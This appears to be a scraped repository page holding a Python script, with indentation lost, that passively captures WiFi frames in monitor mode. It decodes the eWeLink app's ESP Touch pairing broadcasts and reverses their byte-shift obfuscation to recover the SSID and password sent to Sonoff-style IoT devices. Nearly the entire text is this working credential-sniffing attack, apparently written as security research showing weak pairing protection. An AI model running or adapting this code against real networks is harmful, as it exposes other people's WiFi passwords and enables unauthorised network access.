README.md
Rendering markdown...
#!/usr/bin/python3
# eWeLinkESPT is a tool to decode and decrypt the WiFi network credentials transmitted to an ESP-based IoT device supported by the eWeLink mobile application.
# This tool reverses the eWeLink own implementation of the ESP Touch protocol, which is used by-default in the WiFi pairing process of the sonoff and many other IoT devices.
# This tool has been tested with the Android (v4.9.2 and earlier) and iOS (v4.9.1 and earlier) eWeLink application versions.
import pyshark
import sys
import traceback
from tools import rotate, getNextMulticastMAC, printPacket, checkPacketQoS, isMulticastAddress, checkPacketFCS
version = '0.1'
def main():
#Set the initial state and other variables
current_state = 'start'
global_offset = 0
GC_buffer = []
DC_buffer = []
global_ta = ''
global_check_on_ta = False
capture = pyshark.LiveCapture(interface='en0', monitor_mode=True)
print('eWeLinkESPT v'+ version +'.\nWe\'re up & running...\nWaiting for incoming packets.')
for packet in capture.sniff_continuously():
try:
if(checkPacketQoS(packet) and checkPacketFCS(packet)):
p_len = 0
# This takes into account whether the WiFi network is encrypted or not
if("IP" in str(packet.layers)):
p_len = int(packet['IP'].get_field_value('len'))
else:
p_len = int(packet.layers[3].get_field_value('len'))
p_da = str(packet.layers[2].get_field_value('da_resolved'))
p_ta = str(packet.layers[2].get_field_value('ta_resolved'))
if(global_check_on_ta == False):
global_ta = p_ta
if(isMulticastAddress(p_da) and global_ta == p_ta):
print('------------------------------------')
if(current_state == 'start'):
print('current_state: ' + current_state +
'.\nWaiting for the GC sequence to start')
if(p_len >= 512):
printPacket(packet)
GC_buffer.append([p_len, p_da])
print("Jumping to state gc1.")
current_state = 'gc1'
elif(current_state == 'gc1'):
print('current_state: ' + current_state)
if(p_len >= 512):
printPacket(packet)
if(p_len == GC_buffer[-1][0]-1 and p_da == GC_buffer[-1][1]):
GC_buffer.append([p_len, p_da])
print("Jumping to state gc2.")
current_state = 'gc2'
else:
print("Inconsistency detected, resetting")
GC_buffer = []
GC_buffer.append([p_len, p_da])
else:
print("Error detected, coming back to start")
GC_buffer = []
GC_buffer.append([p_len, p_da])
current_state = 'start'
elif (current_state == 'gc2'):
print('current_state: ' + current_state)
if(p_len >= 512):
printPacket(packet)
if(p_len == GC_buffer[-1][0]-1 and p_da == GC_buffer[-1][1]):
GC_buffer.append([p_len, p_da])
print("Jumping to state gc3.")
current_state = 'gc3'
else:
print("Inconsistency detected, resetting")
GC_buffer = []
GC_buffer.append([p_len, p_da])
current_state = 'gc1'
else:
print("Error detected, coming back to start")
GC_buffer = []
GC_buffer.append([p_len, p_da])
current_state = 'start'
elif (current_state == 'gc3'):
print('current_state: ' + current_state)
if(p_len >= 512):
printPacket(packet)
if(p_len == GC_buffer[-1][0]-1 and p_da == GC_buffer[-1][1]):
GC_buffer.append([p_len, p_da])
print("Jumping to state gcok.")
current_state = 'gcok'
else:
print("Inconsistency detected, resetting")
GC_buffer = []
GC_buffer.append([p_len, p_da])
current_state = 'gc1'
else:
print("Error detected, coming back to start")
GC_buffer = []
GC_buffer.append([p_len, p_da])
current_state = 'start'
elif (current_state == 'gcok'):
print('current_state: ' + current_state)
printPacket(packet)
global_offset = GC_buffer[-1][0]-512
if((p_len - global_offset) < 512):
print('global_offset: ' + str(global_offset))
DC_buffer.append([p_len, p_da])
print("Jumping to state dc1.")
global_check_on_ta = True
print('GC completed, global_ta has been set to: ' + str(global_ta))
current_state = 'dc1'
elif (current_state == 'dc1'):
print('current_state: ' + current_state)
printPacket(packet)
if((p_len - global_offset) < 512):
if(p_da == DC_buffer[-1][1] and p_len == DC_buffer[-1][0]):
print("Got repeated packet, ignoring it...")
elif(p_da == DC_buffer[-1][1]):
print("Jumping to state dc2.")
DC_buffer.append([p_len, p_da])
current_state = 'dc2'
else:
print('Error in dc1, staying in dc1, now setting to \'x\' next 3 logged packets (error)')
prev_p_da = DC_buffer[-1][1]
DC_buffer.pop(-1)
DC_buffer.append(['x', prev_p_da])
DC_buffer.append(['x', prev_p_da])
DC_buffer.append(['x', prev_p_da])
while(p_da != getNextMulticastMAC(DC_buffer[-1][1])):
print("An error occurred in multicast destination address sequence")
next_addr = getNextMulticastMAC(DC_buffer[-1][1])
print('writing x3: ' + str(next_addr))
DC_buffer.append(['x', next_addr])
DC_buffer.append(['x', next_addr])
DC_buffer.append(['x', next_addr])
DC_buffer.append([p_len, p_da])
else:
DC_buffer.pop(-1)
print('jumping to final')
current_state = 'end'
elif (current_state == 'dc2'):
print('current_state: ' + current_state)
printPacket(packet)
if((p_len - global_offset) < 512):
if(p_da == DC_buffer[-1][1] and p_len == DC_buffer[-1][0]):
print("Got repeated packet, ignoring it...")
elif(p_da == DC_buffer[-1][1]):
print("Jumping to state dc3.")
DC_buffer.append([p_len, p_da])
current_state = 'dc3'
else:
print('Error in dc2, jumping in dc1, now setting to \'x\' the current x3 frame (error)')
prev_p_da = DC_buffer[-1][1]
DC_buffer.pop(-1)
DC_buffer.pop(-1)
DC_buffer.append(['x', prev_p_da])
DC_buffer.append(['x', prev_p_da])
DC_buffer.append(['x', prev_p_da])
DC_buffer.append([p_len, p_da])
current_state = 'dc1'
else:
DC_buffer.pop(-1)
DC_buffer.pop(-1)
print('Jumping to state final')
current_state = 'end'
elif (current_state == 'dc3'):
print('current_state: ' + current_state)
printPacket(packet)
if((p_len - global_offset) < 512):
if(p_len == DC_buffer[-1][0]):
print("Got repeated packet, ignoring it...")
else:
print("Jumping to state dc1.")
while(str(p_da) != str(getNextMulticastMAC(DC_buffer[-1][1]))):
print("An error occurred in multicast destination address sequence")
next_addr = getNextMulticastMAC(DC_buffer[-1][1])
print('Now setting to \'x\' the current x3 frame (error): ' + str(next_addr))
DC_buffer.append(['x', next_addr])
DC_buffer.append(['x', next_addr])
DC_buffer.append(['x', next_addr])
DC_buffer.append([p_len, p_da])
current_state = 'dc1'
else:
print('Jumping to state final')
current_state = 'end'
elif (current_state == 'end'):
print('current_state: ' + current_state)
print('Now decrypting and decoding.\n')
capture.close()
# packet.length extraction
packet_len_DC_array = list(map(lambda x: x[0], DC_buffer))
print("This is the DC sequence we collected\npacket_len_DC_array len(" +
str(len(packet_len_DC_array)) + '):')
print(packet_len_DC_array)
print('\n')
# sequence number array
DC_sequence_array = []
# sequence number extraction
for i in range(1, len(packet_len_DC_array), 3):
DC_sequence_array.append(packet_len_DC_array[i])
print('These are the extracted sequence numbers\nDC_sequence_array len(' +
str(len(DC_sequence_array)) + '):')
print(DC_sequence_array)
print('\n')
# The following code section is to retrieve min & max sequence values and then calculate the cut interval.
x_pruned_DC_sequence_array = []
for elem in DC_sequence_array:
if(elem != 'x'):
x_pruned_DC_sequence_array.append(elem)
DC_cut_interval = max(x_pruned_DC_sequence_array) - min(x_pruned_DC_sequence_array) + 1
print('DC_cut_interval:' + str(DC_cut_interval))
# Splitting the sequence array by the cut interval
DC_sequence_array_splitted = []
for i in range(0, len(DC_sequence_array), DC_cut_interval):
DC_sequence_array_splitted.append(
DC_sequence_array[i: i+DC_cut_interval])
# Normalizing the last sub_array
if(len(DC_sequence_array_splitted[0]) != len(DC_sequence_array_splitted[-1])):
x_to_add = len(
DC_sequence_array_splitted[0]) - len(DC_sequence_array_splitted[-1])
for i in range(0, x_to_add):
DC_sequence_array_splitted[-1].append('x')
print('Splitted Sequence Arrays ('+ str(len(DC_sequence_array_splitted))+ '):')
for elem in DC_sequence_array_splitted:
print(elem)
print('\n')
# Now working on DC array, splitting it in sub arrays.
DC_buffer_to_decode = []
for i in range(0, len(packet_len_DC_array), len(DC_sequence_array_splitted[0])*3):
DC_buffer_to_decode.append(packet_len_DC_array[i:i+len(DC_sequence_array_splitted[0])*3])
print('DC arrays, there are #('+ str(len(DC_buffer_to_decode))+') sequence which can be used to fix not-overlapping errors:')
for elem in DC_buffer_to_decode:
print(elem)
print('\n')
print('Trying to fix communication errors (if any).')
for i in range(0, len(DC_sequence_array_splitted[0])):
if(DC_sequence_array_splitted[0][i] == 'x'):
print('Trying to fix error on sequence.index ' + str(i) + '.')
for j in range(1, len(DC_sequence_array_splitted)):
if(DC_sequence_array_splitted[j][i] != 'x'):
print('- Error at index ' + str(i) + ' fixed using DC array #' + str(j))
DC_sequence_array_splitted[0][i] = DC_sequence_array_splitted[j][i]
DC_buffer_to_decode[0][i*3] = DC_buffer_to_decode[j][i*3]
DC_buffer_to_decode[0][i*3+1] = DC_buffer_to_decode[j][i*3+1]
DC_buffer_to_decode[0][i*3+2] = DC_buffer_to_decode[j][i*3+2]
break
print('\n')
#Check if the DC sequence is valid
for elem in DC_buffer_to_decode[0]:
if(elem == 'x'):
#Fatal Error: DC sequence could not be recovered, jumping back to start
current_state = 'start'
if(current_state == 'end'):
print('Ok, DC is a valid sequence\nFinal sequence to be decoded, not yet reordered by sequence number value')
print(DC_buffer_to_decode[0])
val2shift = DC_sequence_array_splitted[0].index(min(DC_sequence_array_splitted[0]))
DC_sequence_array_splitted[0] = rotate(DC_sequence_array_splitted[0], val2shift)
DC_buffer_to_decode[0] = rotate(DC_buffer_to_decode[0], val2shift*3)
print('\n')
print('Final Array to be decoded, reordered by sequence number value')
print(DC_buffer_to_decode[0])
print('\n')
# subtracting 28h and the offset
DC_buffer_to_decode[0] = list(map(lambda x: (x - 40 - int(global_offset)), DC_buffer_to_decode[0]))
databytes_without_seq = []
databytes_without_seq.append(DC_buffer_to_decode[0][0])
# extracting only data bytes, without sequence number
for i in range(2, len(DC_buffer_to_decode[0]), 3):
if(i != len(DC_buffer_to_decode[0])-1):
databytes_without_seq.append(DC_buffer_to_decode[0][i])
databytes_without_seq.append(DC_buffer_to_decode[0][i+1])
else:
databytes_without_seq.append(DC_buffer_to_decode[0][i])
print('Byte array to be decrypted (witout sequence numbers) len(' + str(len(databytes_without_seq)) + '):')
print(databytes_without_seq)
print('\n')
# to hex
databytes_without_seq = list(map(lambda x: format(
(int(x) & 255), "02x"), databytes_without_seq))
final_databytes = []
for i in range(0, len(databytes_without_seq), 2):
final_databytes.append(
str(databytes_without_seq[i][1]) + str(databytes_without_seq[i+1][1]))
print('Byte array to be decrypted (witout sequence numbers) already coupled as HEX len(' + str(len(databytes_without_seq)) + '):')
print(final_databytes)
# Decoding and decrypting
if(int(final_databytes[0], 16) == len(final_databytes)):
final_databytes = list(
map(lambda x: bytes.fromhex(x), final_databytes))
pass_len = int.from_bytes(
final_databytes[1], byteorder='big')
ip_addr_arr = final_databytes[5:9]
ip_addr_arr = list(
map(lambda x: int.from_bytes(x, byteorder='big'), ip_addr_arr))
str_ipAddr = str(ip_addr_arr[0]) + "." + str(ip_addr_arr[1]) + "." + str(
ip_addr_arr[2]) + "." + str(ip_addr_arr[3])
pass_arr = final_databytes[9:9+pass_len]
for i in range(0, len(pass_arr)):
if(i % 2 == 0):
pass_arr[i] = int(int.from_bytes(
pass_arr[i], byteorder='big') - 7).to_bytes(1, byteorder='big')
else:
pass_arr[i] = int(int.from_bytes(
pass_arr[i], byteorder='big') - 2).to_bytes(1, byteorder='big')
pass_arr = list(
map(lambda x: x.decode("utf-8"), pass_arr))
str_pass = ""
for c in pass_arr:
str_pass += str(c)
ssid_arr = final_databytes[9+pass_len:]
ssid_arr = list(
map(lambda x: x.decode("utf-8"), ssid_arr))
str_ssid = ""
for c in ssid_arr:
str_ssid += str(c)
print("\n\n\nBSSID: " + str(packet.layers[2].get_field_value('bssid_resolved')))
print("SSID: " + str(str_ssid))
print("Password: " + str(str_pass))
print("Requesting IP Address: " + str(str_ipAddr))
print("Requesting MAC Address: " + str(packet.layers[2].get_field_value('sa_resolved')))
exit()
print('Array non correctly decoded, errors occurred.')
print('Going back to start, and waiting for another GC sequence.')
DC_buffer = []
GC_buffer = []
global_check_on_ta = False
global_ta = ''
global_offset = ''
except Exception:
# Get current system exception
ex_type, ex_value, ex_traceback = sys.exc_info()
# Extract unformatter stack traces as tuples
trace_back = traceback.extract_tb(ex_traceback)
# Format stacktrace
stack_trace = list()
for trace in trace_back:
stack_trace.append("File : %s , Line : %d, Func.Name : %s, Message : %s" % (
trace[0], trace[1], trace[2], trace[3]))
print("Exception type : %s " % ex_type.__name__)
print("Exception message : %s" % ex_value)
print("Stack trace : %s" % stack_trace)
print("Packet: " + str(packet))
exit()
if __name__ == "__main__":
main()